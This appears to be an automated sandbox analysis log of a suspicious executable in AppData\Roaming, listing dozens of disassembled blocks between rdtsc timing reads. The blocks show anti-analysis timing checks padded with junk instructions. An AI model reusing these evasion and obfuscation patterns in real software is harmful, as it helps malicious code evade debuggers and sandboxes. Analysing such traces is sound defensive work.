Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 579F0D second address: 579F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57A82A second address: 57A830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57A830 second address: 57A834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57B4FC second address: 57B55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push ebx 0x0000000b mov dword ptr [ebp+122D1C16h], esi 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D36A9h] 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D37E9h] 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 jmp 00007F95FD07A064h 0x00000029 jl 00007F95FD07A06Fh 0x0000002f jmp 00007F95FD07A069h 0x00000034 popad 0x00000035 push eax 0x00000036 jo 00007F95FD07A05Eh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57BF92 second address: 57BF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57BF96 second address: 57C022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F95FD07A062h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jnl 00007F95FD07A056h 0x00000017 jmp 00007F95FD07A065h 0x0000001c popad 0x0000001d jmp 00007F95FD07A05Eh 0x00000022 popad 0x00000023 nop 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F95FD07A058h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e push 00000000h 0x00000040 mov edi, 535267C2h 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122DB558h], edi 0x0000004d sub edi, dword ptr [ebp+122D2175h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 jg 00007F95FD07A056h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57C022 second address: 57C028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57CA5E second address: 57CACC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F95FD07A058h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1246FD6Eh], esi 0x0000002d pushad 0x0000002e call 00007F95FD07A068h 0x00000033 mov dh, ch 0x00000035 pop ecx 0x00000036 jmp 00007F95FD07A061h 0x0000003b popad 0x0000003c push 00000000h 0x0000003e movzx edi, dx 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 57CACC second address: 57CAE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5809C0 second address: 5809C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 580F68 second address: 580FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F95FD7D899Ch 0x0000000b popad 0x0000000c nop 0x0000000d movzx edi, cx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F95FD7D8998h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D37F5h] 0x00000032 pushad 0x00000033 mov di, 7E9Fh 0x00000037 mov cx, di 0x0000003a popad 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ecx 0x00000040 call 00007F95FD7D8998h 0x00000045 pop ecx 0x00000046 mov dword ptr [esp+04h], ecx 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc ecx 0x00000053 push ecx 0x00000054 ret 0x00000055 pop ecx 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d jnc 00007F95FD7D8996h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 580FE2 second address: 580FE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582EA6 second address: 582EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582EAA second address: 582EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582EB0 second address: 582F14 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F95FD7D8998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D3531h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F95FD7D8998h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d xor edi, 2CE1A601h 0x00000033 sub dword ptr [ebp+1246F861h], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F95FD7D8998h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push esi 0x00000059 pushad 0x0000005a popad 0x0000005b pop esi 0x0000005c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582F14 second address: 582F42 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F95FD07A056h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F95FD07A064h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F95FD07A056h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 582F42 second address: 582F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 583F21 second address: 583F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 583FAB second address: 583FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 586076 second address: 58607B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58607B second address: 586085 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95FD7D899Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58811E second address: 588133 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95FD07A056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F95FD07A056h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 588133 second address: 588183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F95FD7D8998h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D37F1h] 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D177Dh], esi 0x00000033 push 00000000h 0x00000035 mov edi, 071FE1D1h 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58929F second address: 5892A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5892A3 second address: 5892A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5892A9 second address: 5892C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F95FD07A05Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58A410 second address: 58A414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58A414 second address: 58A41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58A41D second address: 58A474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub edi, dword ptr [ebp+1245D7B8h] 0x0000000f push 00000000h 0x00000011 add dword ptr [ebp+1246C0FEh], eax 0x00000017 mov bl, F9h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F95FD7D8998h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F95FD7D89A8h 0x0000003d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 58D43C second address: 58D444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5831CD second address: 5831D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 594732 second address: 594753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F95FD07A068h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 594753 second address: 594760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 594760 second address: 594769 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 598E22 second address: 598E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 598E26 second address: 598E49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F95FD07A061h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jc 00007F95FD07A056h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 598E49 second address: 598E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 536B74 second address: 536B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 536B7B second address: 536B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 536B81 second address: 536B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A060h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C60D second address: 59C613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C613 second address: 59C61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C61E second address: 59C622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5334FD second address: 53350D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 53350D second address: 533529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F95FD7D8996h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95FD7D899Ah 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE44 second address: 59BE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F95FD07A056h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE4E second address: 59BE79 instructions: 0x00000000 rdtsc 0x00000002 je 00007F95FD7D8996h 0x00000008 jmp 00007F95FD7D89A9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F95FD7D8996h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE79 second address: 59BE7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BE7F second address: 59BEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F95FD7D89A9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BEA1 second address: 59BEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BEAA second address: 59BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59BEAE second address: 59BEB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C009 second address: 59C00E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C185 second address: 59C189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C189 second address: 59C18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59C18F second address: 59C1CB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95FD07A06Eh 0x00000008 jmp 00007F95FD07A068h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jno 00007F95FD07A05Eh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007F95FD07A056h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59F86B second address: 59F899 instructions: 0x00000000 rdtsc 0x00000002 js 00007F95FD7D8998h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F95FD7D899Ch 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jns 00007F95FD7D899Ah 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59F899 second address: 59F8BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A065h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F95FD07A056h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 59F9AF second address: 59F9BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F95FD7D8996h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5831D2 second address: 5831E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F95FD07A056h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5831E3 second address: 5831E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A766D second address: 5A7679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7679 second address: 5A7697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD7D89A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7697 second address: 5A76BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F95FD07A05Fh 0x0000000d jns 00007F95FD07A056h 0x00000013 ja 00007F95FD07A056h 0x00000019 popad 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A63D9 second address: 5A63DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A63DE second address: 5A6418 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95FD07A070h 0x00000008 jmp 00007F95FD07A060h 0x0000000d jmp 00007F95FD07A05Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F95FD07A066h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6AF5 second address: 5A6B27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F95FD7D8996h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F95FD7D899Bh 0x00000011 ja 00007F95FD7D8998h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push edi 0x0000001b push edi 0x0000001c jmp 00007F95FD7D899Eh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F18 second address: 5A6F2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F95FD07A05Bh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F2B second address: 5A6F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F2F second address: 5A6F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A6F33 second address: 5A6F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95FD7D89A0h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A71C8 second address: 5A71D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A71D1 second address: 5A71DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F95FD7D8996h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7372 second address: 5A7377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7377 second address: 5A737F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A737F second address: 5A7385 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 5A7385 second address: 5A738E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
